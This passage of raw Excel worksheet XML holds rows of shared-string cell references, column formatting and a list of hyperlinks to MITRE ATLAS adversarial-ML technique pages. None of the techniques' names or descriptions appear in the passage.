        <v>496</v>
      </c>
      <c r="D95" s="36" t="s">
        <v>497</v>
      </c>
      <c r="E95" s="37" t="s">
        <v>498</v>
      </c>
      <c r="F95" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G95" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H95" s="32" t="s">
        <v>66</v>
      </c>
      <c r="I95" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="96" ht="165" spans="1:9">
      <c r="A96" s="32" t="s">
        <v>499</v>
      </c>
      <c r="B96" s="32" t="s">
        <v>500</v>
      </c>
      <c r="C96" s="32" t="s">
        <v>501</v>
      </c>
      <c r="D96" s="36" t="s">
        <v>502</v>
      </c>
      <c r="E96" s="37" t="s">
        <v>503</v>
      </c>
      <c r="F96" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G96" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H96" s="32" t="s">
        <v>66</v>
      </c>
      <c r="I96" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="97" ht="120" spans="1:9">
      <c r="A97" s="32" t="s">
        <v>504</v>
      </c>
      <c r="B97" s="32" t="s">
        <v>505</v>
      </c>
      <c r="C97" s="32" t="s">
        <v>506</v>
      </c>
      <c r="D97" s="36" t="s">
        <v>507</v>
      </c>
      <c r="E97" s="37" t="s">
        <v>508</v>
      </c>
      <c r="F97" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G97" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H97" s="32" t="s">
        <v>242</v>
      </c>
      <c r="I97" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="98" ht="45" spans="1:9">
      <c r="A98" s="32" t="s">
        <v>509</v>
      </c>
      <c r="B98" s="32" t="s">
        <v>510</v>
      </c>
      <c r="C98" s="32" t="s">
        <v>511</v>
      </c>
      <c r="D98" s="36" t="s">
        <v>512</v>
      </c>
      <c r="E98" s="37" t="s">
        <v>513</v>
      </c>
      <c r="F98" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G98" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H98" s="32" t="s">
        <v>28</v>
      </c>
      <c r="I98" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="99" ht="60" spans="1:9">
      <c r="A99" s="32" t="s">
        <v>514</v>
      </c>
      <c r="B99" s="32" t="s">
        <v>515</v>
      </c>
      <c r="C99" s="32" t="s">
        <v>516</v>
      </c>
      <c r="D99" s="36" t="s">
        <v>517</v>
      </c>
      <c r="E99" s="37" t="s">
        <v>518</v>
      </c>
      <c r="F99" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G99" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H99" s="32" t="s">
        <v>22</v>
      </c>
      <c r="I99" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="100" ht="30" spans="1:9">
      <c r="A100" s="32" t="s">
        <v>519</v>
      </c>
      <c r="B100" s="32" t="s">
        <v>520</v>
      </c>
      <c r="C100" s="32" t="s">
        <v>521</v>
      </c>
      <c r="D100" s="36" t="s">
        <v>522</v>
      </c>
      <c r="E100" s="37" t="s">
        <v>523</v>
      </c>
      <c r="F100" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G100" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H100" s="32" t="s">
        <v>28</v>
      </c>
      <c r="I100" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="101" ht="105" spans="1:9">
      <c r="A101" s="32" t="s">
        <v>524</v>
      </c>
      <c r="B101" s="32" t="s">
        <v>525</v>
      </c>
      <c r="C101" s="32" t="s">
        <v>526</v>
      </c>
      <c r="D101" s="36" t="s">
        <v>527</v>
      </c>
      <c r="E101" s="37" t="s">
        <v>528</v>
      </c>
      <c r="F101" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G101" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H101" s="32" t="s">
        <v>40</v>
      </c>
      <c r="I101" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="102" ht="45" spans="1:9">
      <c r="A102" s="32" t="s">
        <v>529</v>
      </c>
      <c r="B102" s="32" t="s">
        <v>530</v>
      </c>
      <c r="C102" s="32" t="s">
        <v>531</v>
      </c>
      <c r="D102" s="36" t="s">
        <v>532</v>
      </c>
      <c r="E102" s="37" t="s">
        <v>533</v>
      </c>
      <c r="F102" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G102" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H102" s="32" t="s">
        <v>99</v>
      </c>
      <c r="I102" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="103" ht="165" spans="1:9">
      <c r="A103" s="32" t="s">
        <v>534</v>
      </c>
      <c r="B103" s="32" t="s">
        <v>535</v>
      </c>
      <c r="C103" s="32" t="s">
        <v>536</v>
      </c>
      <c r="D103" s="36" t="s">
        <v>537</v>
      </c>
      <c r="E103" s="37" t="s">
        <v>538</v>
      </c>
      <c r="F103" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G103" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H103" s="32" t="s">
        <v>22</v>
      </c>
      <c r="I103" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="104" ht="45" spans="1:9">
      <c r="A104" s="32" t="s">
        <v>539</v>
      </c>
      <c r="B104" s="32" t="s">
        <v>540</v>
      </c>
      <c r="C104" s="32" t="s">
        <v>541</v>
      </c>
      <c r="D104" s="36" t="s">
        <v>542</v>
      </c>
      <c r="E104" s="37" t="s">
        <v>543</v>
      </c>
      <c r="F104" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G104" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H104" s="32" t="s">
        <v>99</v>
      </c>
      <c r="I104" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="105" ht="30" spans="1:9">
      <c r="A105" s="32" t="s">
        <v>544</v>
      </c>
      <c r="B105" s="32" t="s">
        <v>545</v>
      </c>
      <c r="C105" s="32" t="s">
        <v>546</v>
      </c>
      <c r="D105" s="36" t="s">
        <v>547</v>
      </c>
      <c r="E105" s="37" t="s">
        <v>548</v>
      </c>
      <c r="F105" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G105" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H105" s="32" t="s">
        <v>99</v>
      </c>
      <c r="I105" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="106" ht="135" spans="1:9">
      <c r="A106" s="32" t="s">
        <v>549</v>
      </c>
      <c r="B106" s="32" t="s">
        <v>550</v>
      </c>
      <c r="C106" s="32" t="s">
        <v>551</v>
      </c>
      <c r="D106" s="36" t="s">
        <v>552</v>
      </c>
      <c r="E106" s="37" t="s">
        <v>553</v>
      </c>
      <c r="F106" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G106" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H106" s="32" t="s">
        <v>66</v>
      </c>
      <c r="I106" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="107" ht="60" spans="1:9">
      <c r="A107" s="32" t="s">
        <v>554</v>
      </c>
      <c r="B107" s="32" t="s">
        <v>555</v>
      </c>
      <c r="C107" s="32" t="s">
        <v>556</v>
      </c>
      <c r="D107" s="36" t="s">
        <v>557</v>
      </c>
      <c r="E107" s="37" t="s">
        <v>558</v>
      </c>
      <c r="F107" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G107" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H107" s="32" t="s">
        <v>82</v>
      </c>
      <c r="I107" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="108" ht="150" spans="1:9">
      <c r="A108" s="32" t="s">
        <v>559</v>
      </c>
      <c r="B108" s="32" t="s">
        <v>560</v>
      </c>
      <c r="C108" s="32" t="s">
        <v>561</v>
      </c>
      <c r="D108" s="36" t="s">
        <v>562</v>
      </c>
      <c r="E108" s="37" t="s">
        <v>563</v>
      </c>
      <c r="F108" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G108" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H108" s="32" t="s">
        <v>82</v>
      </c>
      <c r="I108" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="109" ht="90" spans="1:9">
      <c r="A109" s="32" t="s">
        <v>564</v>
      </c>
      <c r="B109" s="32" t="s">
        <v>565</v>
      </c>
      <c r="C109" s="32" t="s">
        <v>566</v>
      </c>
      <c r="D109" s="36" t="s">
        <v>567</v>
      </c>
      <c r="E109" s="37" t="s">
        <v>568</v>
      </c>
      <c r="F109" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G109" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H109" s="32" t="s">
        <v>105</v>
      </c>
      <c r="I109" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="110" ht="75" spans="1:9">
      <c r="A110" s="32" t="s">
        <v>569</v>
      </c>
      <c r="B110" s="32" t="s">
        <v>570</v>
      </c>
      <c r="C110" s="32" t="s">
        <v>571</v>
      </c>
      <c r="D110" s="36" t="s">
        <v>572</v>
      </c>
      <c r="E110" s="37" t="s">
        <v>573</v>
      </c>
      <c r="F110" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G110" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H110" s="32" t="s">
        <v>574</v>
      </c>
      <c r="I110" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="111" ht="30" spans="1:9">
      <c r="A111" s="32" t="s">
        <v>575</v>
      </c>
      <c r="B111" s="32" t="s">
        <v>576</v>
      </c>
      <c r="C111" s="32" t="s">
        <v>577</v>
      </c>
      <c r="D111" s="36" t="s">
        <v>578</v>
      </c>
      <c r="E111" s="37" t="s">
        <v>579</v>
      </c>
      <c r="F111" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G111" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H111" s="32" t="s">
        <v>82</v>
      </c>
      <c r="I111" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="112" ht="75" spans="1:9">
      <c r="A112" s="32" t="s">
        <v>580</v>
      </c>
      <c r="B112" s="32" t="s">
        <v>581</v>
      </c>
      <c r="C112" s="32" t="s">
        <v>582</v>
      </c>
      <c r="D112" s="36" t="s">
        <v>583</v>
      </c>
      <c r="E112" s="37" t="s">
        <v>584</v>
      </c>
      <c r="F112" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G112" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H112" s="32" t="s">
        <v>105</v>
      </c>
      <c r="I112" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="113" ht="45" spans="1:9">
      <c r="A113" s="32" t="s">
        <v>585</v>
      </c>
      <c r="B113" s="32" t="s">
        <v>586</v>
      </c>
      <c r="C113" s="32" t="s">
        <v>587</v>
      </c>
      <c r="D113" s="36" t="s">
        <v>588</v>
      </c>
      <c r="E113" s="37" t="s">
        <v>589</v>
      </c>
      <c r="F113" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G113" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H113" s="32" t="s">
        <v>28</v>
      </c>
      <c r="I113" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="114" ht="120" spans="1:9">
      <c r="A114" s="32" t="s">
        <v>590</v>
      </c>
      <c r="B114" s="32" t="s">
        <v>591</v>
      </c>
      <c r="C114" s="32" t="s">
        <v>592</v>
      </c>
      <c r="D114" s="36" t="s">
        <v>593</v>
      </c>
      <c r="E114" s="37" t="s">
        <v>594</v>
      </c>
      <c r="F114" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G114" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H114" s="32" t="s">
        <v>40</v>
      </c>
      <c r="I114" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="115" ht="105" spans="1:9">
      <c r="A115" s="32" t="s">
        <v>595</v>
      </c>
      <c r="B115" s="32" t="s">
        <v>596</v>
      </c>
      <c r="C115" s="32" t="s">
        <v>597</v>
      </c>
      <c r="D115" s="36" t="s">
        <v>598</v>
      </c>
      <c r="E115" s="37" t="s">
        <v>599</v>
      </c>
      <c r="F115" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G115" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H115" s="32" t="s">
        <v>82</v>
      </c>
      <c r="I115" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="116" ht="45" spans="1:9">
      <c r="A116" s="32" t="s">
        <v>600</v>
      </c>
      <c r="B116" s="32" t="s">
        <v>601</v>
      </c>
      <c r="C116" s="32" t="s">
        <v>602</v>
      </c>
      <c r="D116" s="36" t="s">
        <v>603</v>
      </c>
      <c r="E116" s="37" t="s">
        <v>604</v>
      </c>
      <c r="F116" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G116" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H116" s="32" t="s">
        <v>82</v>
      </c>
      <c r="I116" s="32" t="s">
        <v>16</v>
      </c>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink ref="E2" r:id="rId1" display="https://atlas.mitre.org/techniques/AML.T0035"/>
    <hyperlink ref="E3" r:id="rId2" display="https://atlas.mitre.org/techniques/AML.T0008.000"/>
    <hyperlink ref="E4" r:id="rId3" display="https://atlas.mitre.org/techniques/AML.T0048.004"/>
    <hyperlink ref="E5" r:id="rId4" display="https://atlas.mitre.org/techniques/AML.T0040"/>
    <hyperlink ref="E6" r:id="rId5" display="https://atlas.mitre.org/techniques/AML.T0010.001"/>
    <hyperlink ref="E7" r:id="rId6" display="https://atlas.mitre.org/techniques/AML.T0010"/>
    <hyperlink ref="E8" r:id="rId7" display="https://atlas.mitre.org/techniques/AML.T0047"/>
    <hyperlink ref="E9" r:id="rId8" display="https://atlas.mitre.org/techniques/AML.T0008"/>
    <hyperlink ref="E10" r:id="rId9" display="https://atlas.mitre.org/techniques/AML.T0002"/>
    <hyperlink ref="E11" r:id="rId10" display="https://atlas.mitre.org/techniques/AML.T0006"/>
    <hyperlink ref="E12" r:id="rId11" display="https://atlas.mitre.org/techniques/AML.T0016.000"/>
    <hyperlink ref="E13" r:id="rId12" display="https://atlas.mitre.org/techniques/AML.T0017.000"/>
    <hyperlink ref="E14" r:id="rId13" display="https://atlas.mitre.org/techniques/AML.T0043.001"/>
    <hyperlink ref="E15" r:id="rId14" display="https://atlas.mitre.org/techniques/AML.T0043.002"/>
    <hyperlink ref="E16" r:id="rId15" display="https://atlas.mitre.org/techniques/AML.T0067.000"/>
    <hyperlink ref="E17" r:id="rId16" display="https://atlas.mitre.org/techniques/AML.T0075"/>
    <hyperlink ref="E18" r:id="rId17" display="https://atlas.mitre.org/techniques/AML.T0050"/>
    <hyperlink ref="E19" r:id="rId18" display="https://atlas.mitre.org/techniques/AML.T0008.001"/>
    <hyperlink ref="E20" r:id="rId19" display="https://atlas.mitre.org/techniques/AML.T0010.004"/>
    <hyperlink ref="E21" r:id="rId20" display="https://atlas.mitre.org/techniques/AML.T0076"/>
    <hyperlink ref="E22" r:id="rId21" display="https://atlas.mitre.org/techniques/AML.T0034"/>
    <hyperlink ref="E23" r:id="rId22" display="https://atlas.mitre.org/techniques/AML.T0043"/>
    <hyperlink ref="E24" r:id="rId23" display="https://atlas.mitre.org/techniques/AML.T0005"/>
    <hyperlink ref="E25" r:id="rId24" display="https://atlas.mitre.org/techniques/AML.T0010.002"/>
    <hyperlink ref="E26" r:id="rId25" display="https://atlas.mitre.org/techniques/AML.T0036"/>
    <hyperlink ref="E27" r:id="rId26" display="https://atlas.mitre.org/techniques/AML.T0037"/>
    <hyperlink ref="E28" r:id="rId27" display="https://atlas.mitre.org/techniques/AML.T0002.000"/>
    <hyperlink ref="E29" r:id="rId28" display="https://atlas.mitre.org/techniques/AML.T0029"/>
    <hyperlink ref="E30" r:id="rId29" display="https://atlas.mitre.org/techniques/AML.T0017"/>
    <hyperlink ref="E31" r:id="rId30" display="https://atlas.mitre.org/techniques/AML.T0051.000"/>
    <hyperlink ref="E32" r:id="rId31" display="https://atlas.mitre.org/techniques/AML.T0007"/>
    <hyperlink ref="E33" r:id="rId32" display="https://atlas.mitre.org/techniques/AML.T0014"/>
    <hyperlink ref="E34" r:id="rId33" display="https://atlas.mitre.org/techniques/AML.T0013"/>
    <hyperlink ref="E35" r:id="rId34" display="https://atlas.mitre.org/techniques/AML.T0063"/>
    <hyperlink ref="E36" r:id="rId35" display="https://atlas.mitre.org/techniques/AML.T0062"/>
    <hyperlink ref="E37" r:id="rId36" display="https://atlas.mitre.org/techniques/AML.T0069"/>
    <hyperlink ref="E38" r:id="rId37" display="https://atlas.mitre.org/techniques/AML.T0008.002"/>
    <hyperlink ref="E39" r:id="rId38" display="https://atlas.mitre.org/techniques/AML.T0078"/>
    <hyperlink ref="E40" r:id="rId39" display="https://atlas.mitre.org/techniques/AML.T0018.002"/>
    <hyperlink ref="E41" r:id="rId40" display="https://atlas.mitre.org/techniques/AML.T0031"/>
    <hyperlink ref="E42" r:id="rId41" display="https://atlas.mitre.org/techniques/AML.T0059"/>
    <hyperlink ref="E43" r:id="rId42" display="https://atlas.mitre.org/techniques/AML.T0021"/>
    <hyperlink ref="E44" r:id="rId43" display="https://atlas.mitre.org/techniques/AML.T0015"/>
    <hyperlink ref="E45" r:id="rId44" display="https://atlas.mitre.org/techniques/AML.T0024"/>
    <hyperlink ref="E46" r:id="rId45" display="https://atlas.mitre.org/techniques/AML.T0025"/>
    <hyperlink ref="E47" r:id="rId46" display="https://atlas.mitre.org/techniques/AML.T0049"/>
    <hyperlink ref="E48" r:id="rId47" display="https://atlas.mitre.org/techniques/AML.T0048"/>
    <hyperlink ref="E49" r:id="rId48" display="https://atlas.mitre.org/techniques/AML.T0024.002"/>
    <hyperlink ref="E50" r:id="rId49" display="https://atlas.mitre.org/techniques/AML.T0056"/>
    <hyperlink ref="E51" r:id="rId50" display="https://atlas.mitre.org/techniques/AML.T0071"/>
    <hyperlink ref="E52" r:id="rId51" display="https://atlas.mitre.org/techniques/AML.T0048.000"/>
    <hyperlink ref="E53" r:id="rId52" display="https://atlas.mitre.org/techniques/AML.T0044"/>
    <hyperlink ref="E54" r:id="rId53" display="https://atlas.mitre.org/techniques/AML.T0064"/>
    <hyperlink ref="E55" r:id="rId54" display="https://atlas.mitre.org/techniques/AML.T0016.002"/>
    <hyperlink ref="E56" r:id="rId55" display="https://atlas.mitre.org/techniques/AML.T0010.000"/>
    <hyperlink ref="E57" r:id="rId56" display="https://atlas.mitre.org/techniques/AML.T0073"/>
    <hyperlink ref="E58" r:id="rId57" display="https://atlas.mitre.org/techniques/AML.T0051.001"/>
    <hyperlink ref="E59" r:id="rId58" display="https://atlas.mitre.org/techniques/AML.T0024.000"/>
    <hyperlink ref="E60" r:id="rId59" display="https://atlas.mitre.org/techniques/AML.T0043.004"/>
    <hyperlink ref="E61" r:id="rId60" display="https://atlas.mitre.org/techniques/AML.T0024.001"/>
    <hyperlink ref="E62" r:id="rId61" display="https://atlas.mitre.org/techniques/AML.T0000.000"/>
    <hyperlink ref="E63" r:id="rId62" display="https://atlas.mitre.org/techniques/AML.T0057"/>
    <hyperlink ref="E64" r:id="rId63" display="https://atlas.mitre.org/techniques/AML.T0054"/>
    <hyperlink ref="E65" r:id="rId64" display="https://atlas.mitre.org/techniques/AML.T0053"/>
    <hyperlink ref="E66" r:id="rId65" display="https://atlas.mitre.org/techniques/AML.T0065"/>
    <hyperlink ref="E67" r:id="rId66" display="https://atlas.mitre.org/techniques/AML.T0051"/>
    <hyperlink ref="E68" r:id="rId67" display="https://atlas.mitre.org/techniques/AML.T0068"/>
    <hyperlink ref="E69" r:id="rId68" display="https://atlas.mitre.org/techniques/AML.T0061"/>
    <hyperlink ref="E70" r:id="rId69" display="https://atlas.mitre.org/techniques/AML.T0077"/>
    <hyperlink ref="E71" r:id="rId70" display="https://atlas.mitre.org/techniques/AML.T0067"/>
    <hyperlink ref="E72" r:id="rId71" display="https://atlas.mitre.org/techniques/AML.T0011.001"/>
    <hyperlink ref="E73" r:id="rId72" display="https://atlas.mitre.org/techniques/AML.T0018"/>
    <hyperlink ref="E74" r:id="rId73" display="https://atlas.mitre.org/techniques/AML.T0043.003"/>
    <hyperlink ref="E75" r:id="rId74" display="https://atlas.mitre.org/techniques/AML.T0074"/>
    <hyperlink ref="E76" r:id="rId75" display="https://atlas.mitre.org/techniques/AML.T0010.003"/>
    <hyperlink ref="E77" r:id="rId76" display="https://atlas.mitre.org/techniques/AML.T0002.001"/>
    <hyperlink ref="E78" r:id="rId77" display="https://atlas.mitre.org/techniques/AML.T0018.001"/>
    <hyperlink ref="E79" r:id="rId78" display="https://atlas.mitre.org/techniques/AML.T0016"/>
    <hyperlink ref="E80" r:id="rId79" display="https://atlas.mitre.org/techniques/AML.T0052"/>
    <hyperlink ref="E81" r:id="rId80" display="https://atlas.mitre.org/techniques/AML.T0008.003"/>
    <hyperlink ref="E82" r:id="rId81" display="https://atlas.mitre.org/techniques/AML.T0041"/>
    <hyperlink ref="E83" r:id="rId82" display="https://atlas.mitre.org/techniques/AML.T0018.000"/>
    <hyperlink ref="E84" r:id="rId83" display="https://atlas.mitre.org/techniques/AML.T0020"/>
    <hyperlink ref="E85" r:id="rId84" display="https://atlas.mitre.org/techniques/AML.T0000.001"/>
    <hyperlink ref="E86" r:id="rId85" display="https://atlas.mitre.org/techniques/AML.T0060"/>
    <hyperlink ref="E87" r:id="rId86" display="https://atlas.mitre.org/techniques/AML.T0019"/>
    <hyperlink ref="E88" r:id="rId87" display="https://atlas.mitre.org/techniques/AML.T0058"/>
    <hyperlink ref="E89" r:id="rId88" display="https://atlas.mitre.org/techniques/AML.T0070"/>
    <hyperlink ref="E90" r:id="rId89" display="https://atlas.mitre.org/techniques/AML.T0048.001"/>
    <hyperlink ref="E91" r:id="rId90" display="https://atlas.mitre.org/techniques/AML.T0066"/>
    <hyperlink ref="E92" r:id="rId91" display="https://atlas.mitre.org/techniques/AML.T0072"/>
    <hyperlink ref="E93" r:id="rId92" display="https://atlas.mitre.org/techniques/AML.T0004"/>
    <hyperlink ref="E94" r:id="rId93" display="https://atlas.mitre.org/techniques/AML.T0001"/>
    <hyperlink ref="E95" r:id="rId94" display="https://atlas.mitre.org/techniques/AML.T0000"/>
    <hyperlink ref="E96" r:id="rId95" display="https://atlas.mitre.org/techniques/AML.T0003"/>
    <hyperlink ref="E97" r:id="rId96" display="https://atlas.mitre.org/techniques/AML.T0008.004"/>
    <hyperlink ref="E98" r:id="rId97" display="https://atlas.mitre.org/techniques/AML.T0048.002"/>
    <hyperlink ref="E99" r:id="rId98" display="https://atlas.mitre.org/techniques/AML.T0016.001"/>
    <hyperlink ref="E100" r:id="rId99" display="https://atlas.mitre.org/techniques/AML.T0046"/>
    <hyperlink ref="E101" r:id="rId100" display="https://atlas.mitre.org/techniques/AML.T0052.000"/>
    <hyperlink ref="E102" r:id="rId101" display="https://atlas.mitre.org/techniques/AML.T0069.000"/>
    <hyperlink ref="E103" r:id="rId102" display="https://atlas.mitre.org/techniques/AML.T0079"/>
    <hyperlink ref="E104" r:id="rId103" display="https://atlas.mitre.org/techniques/AML.T0069.001"/>
    <hyperlink ref="E105" r:id="rId104" display="https://atlas.mitre.org/techniques/AML.T0069.002"/>
    <hyperlink ref="E106" r:id="rId105" display="https://atlas.mitre.org/techniques/AML.T0000.002"/>
    <hyperlink ref="E107" r:id="rId106" display="https://atlas.mitre.org/techniques/AML.T0005.000"/>
    <hyperlink ref="E108" r:id="rId107" display="https://atlas.mitre.org/techniques/AML.T0005.001"/>
    <hyperlink ref="E109" r:id="rId108" display="https://atlas.mitre.org/techniques/AML.T0011.000"/>
    <hyperlink ref="E110" r:id="rId109" display="https://atlas.mitre.org/techniques/AML.T0055"/>
    <hyperlink ref="E111" r:id="rId110" display="https://atlas.mitre.org/techniques/AML.T0005.002"/>
    <hyperlink ref="E112" r:id="rId111" display="https://atlas.mitre.org/techniques/AML.T0011"/>
    <hyperlink ref="E113" r:id="rId112" display="https://atlas.mitre.org/techniques/AML.T0048.003"/>
    <hyperlink ref="E114" r:id="rId113" display="https://atlas.mitre.org/techniques/AML.T0012"/>
    <hyperlink ref="E115" r:id="rId114" display="https://atlas.mitre.org/techniques/AML.T0042"/>
    <hyperlink ref="E116" r:id="rId115" display="https://atlas.mitre.org/techniques/AML.T0043.000"/>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A1" sqref="A1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="15" outlineLevelCol="6"/>
  <cols>
    <col min="1" max="1" width="14.4444444444444" style="27" customWidth="1"/>
    <col min="2" max="2" width="64.2222222222222" style="27" customWidth="1"/>
    <col min="3" max="3" width="25.6666666666667" style="27" customWidth="1"/>
    <col min="4" max="4" width="90.4444444444444" style="34" customWidth="1"/>
    <col min="5" max="5" width="49" style="34" customWidth="1"/>
    <col min="6" max="6" width="15.4444444444444" style="27" customWidth="1"/>
    <col min="7" max="7" width="15.8888888888889" style="27" customWidth="1"/>
    <col min="8" max="16384" width="9" style="27"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7">
      <c r="A1" s="29" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="29" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="29" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="35" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="35" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="29" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="29" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="2" ht="150" spans="1:7">
      <c r="A2" s="32" t="s">
        <v>605</v>
      </c>
      <c r="B2" s="32" t="s">
        <v>606</v>
      </c>
      <c r="C2" s="32" t="s">
        <v>82</v>
      </c>
      <c r="D2" s="36" t="s">
        <v>607</v>
      </c>
      <c r="E2" s="37" t="s">
        <v>608</v>
      </c>
      <c r="F2" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G2" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="3" ht="195" spans="1:7">
      <c r="A3" s="32" t="s">
        <v>609</v>
      </c>
      <c r="B3" s="32" t="s">
        <v>610</v>
      </c>
      <c r="C3" s="32" t="s">
        <v>34</v>
      </c>
      <c r="D3" s="36" t="s">
        <v>611</v>
      </c>
      <c r="E3" s="37" t="s">
        <v>612</v>
      </c>
      <c r="F3" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G3" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="4" ht="150" spans="1:7">
      <c r="A4" s="32" t="s">
        <v>613</v>
      </c>
      <c r="B4" s="32" t="s">
        <v>614</v>
      </c>
      <c r="C4" s="32" t="s">
        <v>15</v>
      </c>
      <c r="D4" s="36" t="s">
        <v>615</v>
      </c>
      <c r="E4" s="37" t="s">
        <v>616</v>
      </c>
      <c r="F4" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G4" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="5" ht="105" spans="1:7">
      <c r="A5" s="32" t="s">
        <v>617</v>
      </c>
      <c r="B5" s="32" t="s">
        <v>618</v>
      </c>
      <c r="C5" s="32" t="s">
        <v>483</v>
      </c>
      <c r="D5" s="36" t="s">
        <v>619</v>
      </c>
      <c r="E5" s="37" t="s">
        <v>620</v>
      </c>
      <c r="F5" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G5" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="6" ht="105" spans="1:7">
      <c r="A6" s="32" t="s">
        <v>621</v>
      </c>
      <c r="B6" s="32" t="s">
        <v>622</v>
      </c>
      <c r="C6" s="32" t="s">
        <v>574</v>
      </c>
      <c r="D6" s="36" t="s">
        <v>623</v>
      </c>
      <c r="E6" s="37" t="s">
        <v>624</v>
      </c>
      <c r="F6" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G6" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="7" ht="90" spans="1:7">
      <c r="A7" s="32" t="s">
        <v>625</v>
      </c>
      <c r="B7" s="32" t="s">
        <v>626</v>
      </c>
      <c r="C7" s="32" t="s">
        <v>93</v>
      </c>
      <c r="D7" s="36" t="s">
        <v>627</v>
      </c>
      <c r="E7" s="37" t="s">
        <v>628</v>
      </c>
      <c r="F7" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G7" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="8" ht="150" spans="1:7">
      <c r="A8" s="32" t="s">
        <v>629</v>
      </c>
      <c r="B8" s="32" t="s">
        <v>630</v>
      </c>
      <c r="C8" s="32" t="s">
        <v>99</v>
      </c>
      <c r="D8" s="36" t="s">
        <v>631</v>
      </c>
      <c r="E8" s="37" t="s">
        <v>632</v>
      </c>
      <c r="F8" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G8" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="9" ht="120" spans="1:7">
      <c r="A9" s="32" t="s">
        <v>633</v>
      </c>
      <c r="B9" s="32" t="s">
        <v>634</v>
      </c>
      <c r="C9" s="32" t="s">
        <v>105</v>
      </c>
      <c r="D9" s="36" t="s">
        <v>635</v>
      </c>
      <c r="E9" s="37" t="s">
        <v>636</v>
      </c>
      <c r="F9" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G9" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="10" ht="150" spans="1:7">
      <c r="A10" s="32" t="s">
        <v>637</v>
      </c>
      <c r="B10" s="32" t="s">
        <v>638</v>
      </c>
      <c r="C10" s="32" t="s">
        <v>242</v>
      </c>
      <c r="D10" s="36" t="s">
